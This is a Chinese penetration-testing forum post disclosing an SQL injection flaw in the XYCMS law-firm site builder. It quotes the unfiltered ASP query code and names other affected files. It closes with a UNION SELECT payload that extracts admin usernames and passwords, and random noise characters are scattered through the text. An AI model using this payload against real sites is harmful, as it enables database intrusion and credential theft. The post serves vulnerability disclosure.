中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似. O2 ^# ?2 Y- t3 I, n

) j. ]7 F$ v/ q' w# v- V9 L) J2 ?淫荡分割线
4 |: ~3 f. \# l--------------------------------------------------------
1 c5 t1 ^6 p* w6 t7 \3 `! Q- y' d
" n4 q% t5 d& f- X' C! n9 X审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
3 D8 h2 g. c; r, Q5 W. |源码地址:http://down.chinaz.com/soft/29233.htm
$ z9 w0 u/ s* N) H9 G0 H . f; q. e7 P# m) q4 f
漏洞文件:shownews.asp
% i3 a! S  l: T, g漏洞代码:7-13行
& N! M1 a/ Y5 Z1 `/ x" L4 W* s! T # g$ B- O* q) P* g& x- J
4 M* s. P/ q; v* a) o# d: c  _9 s
<% 7 y+ s, G* G! u8 o/ K
id=request.QueryString("id")
9 T! V! m* G9 P  V    # i; U( f7 k- P5 R# i  G( L$ N
set snews=server.createobject("adodb.recordset")
! a+ b4 t2 ], `, g8 W" L9 sexec="select * from [news] where id="&id
$ L% s. i0 v. A( S5 Dsnews.open exec,conn,1,18 n/ a9 K- N) Z6 S5 Q& A5 Z
%>
* E( P0 `4 N2 @" [! b0 b4 c" C : Q3 S1 N6 R; x" e" F# _: f
* f" u3 R# s; }, z
什么过滤都没有  直造成注入+ \8 N' O" i- u; r- R
8 \) S/ l0 ^4 ~. H
注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ n8 D' X( N7 N& O8 Q
+ ?: ]8 @% q6 k$ L0 D其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
* @& A, X' O; N ! ]1 M/ T) N3 \" h! I  @2 e
/ g" {1 E; S4 a" }5 \/ @
exp: union select 1,admin,password,4,5,7 from admin_user
' Z( n' B2 E) r( [+ j7 k* t5 S( u- }2 h4 B6 X





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2